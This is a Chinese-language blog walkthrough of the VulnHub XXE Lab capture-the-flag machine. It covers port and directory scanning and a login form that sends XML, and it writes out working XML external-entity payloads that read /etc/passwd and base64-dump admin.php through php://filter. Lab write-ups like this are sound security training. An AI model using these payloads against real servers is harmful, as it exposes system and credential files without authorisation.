XXE漏洞靶场复现

最新推荐文章于 2024-04-17 13:36:49 发布
最新推荐文章于 2024-04-17 13:36:49 发布
阅读量843 收藏 5
点赞数 1
文章标签: 网络 安全 xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127406604
版权

什么是XXE漏洞?

XXE也叫XML(可扩展标记语言)外部实体注入,然后我们这里拆开来解释!!!

外部实体:通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。

注入:在XML数据传输过程中,数据被恶意修改,导致服务器最终执行了修改后的恶意代码。

因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。

靶机地址:https://download.vulnhub.com/xxe/XXE.zip

靶机目标:SAFCSP{xxe_is_so_easy}

步骤一:环境搭建

步骤二:漏洞复现

1、确定靶机IP

2、扫描开放端口

3、使用御剑对目录进行扫描...发现存在robots.txt文件进行访问...

4、 访问以地址发现是用户登录界面...并尝试访问admin.php这个文件...在用户登录界面进行抓包发现是XML格式进行的数据传输...

http://192.168.1.48/xxe/admin.php #用户登录界面

5、尝试构造XXE注入语句...读取文件成功...尝试读取XXE目录下的admin.php文件内容...

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "file:///etc/passwd">

]>

<root><name>&admin;</name><password>1</password></root>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY >

<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

]>

<root><name>&admin;</name><password>1</password></root>

6、将返回的Base64加密进行解密...

7、发现其中的用户administhebest对应的MD5加密值...解密为admin@123

8、进行登录...查看页面源代码....获取flag...

9、先进行Base32解密在进行base64解密..回到BP中再次读取文件...进行base64解密....

10、对/etc/.flag.php读取的文件内容进行解码为 并保存成PHP文件并在PHPStudy下访问...

恸.283
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
PHP之XXE漏洞靶场详解
sixoneyvye的博客
12-09 3978
PHP之XXE漏洞靶场详解 00x1 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 00x2 XML基础知识 XML是一...
burpsuite靶场——XXE
qq_61768489的博客
12-26 1040
XML全称是可扩展标记语言,是用来存储和传输数据的一种数据格式,结构上和HTML类似,但是XML使用的是自定义的标签名,XML在Web早期中比较流行,现在开始流行JSON格式的数据了。XML实体是一种表示数据项的方式,比如用实体< and >表示符号,XML用实体来表示XML标签。DTD全称是document type definition,其可以定义XML文档的结构、它可以包含的数据类型和其他项目。DTD在XML文档开头以可选DOCTYPE节点中声明。
XXE漏洞原理和pikachu靶场实验
03-16 1069
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。
WEB常见漏洞XXE靶场篇)_220 vmware authentication daemon version 1
最新发布
2401_84150530的博客
04-17 789
xxe-lab是一个使用PHP,Java,python,C#四种当下最常用语言的网站编写语言来编写的一个存在xxe漏洞的Web demo。靶场地址:https://github.com/c0ny1/xxe-lab。
burp靶场--XXE注入
qq_33168924的博客
01-16 1122
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而...对于初学者,通过实践靶场可以更好地理解和掌握XXE漏洞的相关知识。
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
5、XXE漏洞pdf资料
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
XXE漏洞复现
m0_57485346的博客
03-15 638
XXE漏洞复现
xxe漏洞浅谈以及复现
weixin_51692662的博客
10-18 1946
xxe
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2695
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
XXE外部实体引入漏洞原理及复现
G3et的博客
02-26 727
XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。
VulnHub XXE Lab: 1 WP
小小的花园里面挖呀挖呀~
08-31 9133
XXE(XML External Entity Injection) XML外部实体注入,XML是一种类似于HTML(超文本标记语言)的可扩展标记语言,是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 XXE Lab: 1 下载地址:https://download.vulnhub.com/xxe/XXE.zip 扫描子网段发现靶机IP为:172.16.12.1.
phpshe v1.7漏洞复现(Sql injection+XXE)
weixin_51681694的博客
04-30 630
PHPSHE v1.7 sql注入,XXE
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
02-25 5031
写在前面 这个系列开始写写XXE相关的东西,这里时第一部分,相关资料及使用靶场如下: https://www.w3schools.com/xml/ https://portswigger.net/web-security/xxe 为了更方便你检索题目且由于是国外网站,会带有一定外语及翻译,开始吧 Exploiting XXE using external entities to retrieve files(利用外部实体利用XXE来检索文件) 打开环境 是一个商店页面的模拟,先找找可疑的点吧,点进商品
xxe靶机漏洞复现
千寻的博客
05-25 1254
0x00 XML介绍 可扩展标记语言,标准通用标记语言的子集,简称XML。 是一种用于标记电子文件使其具有结构性的标记语言。 在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。 它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。 是Internet环境中跨平台的、依赖于内容的技术,也是当今处理分布式结构信息的有效工具。 早在1998年
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值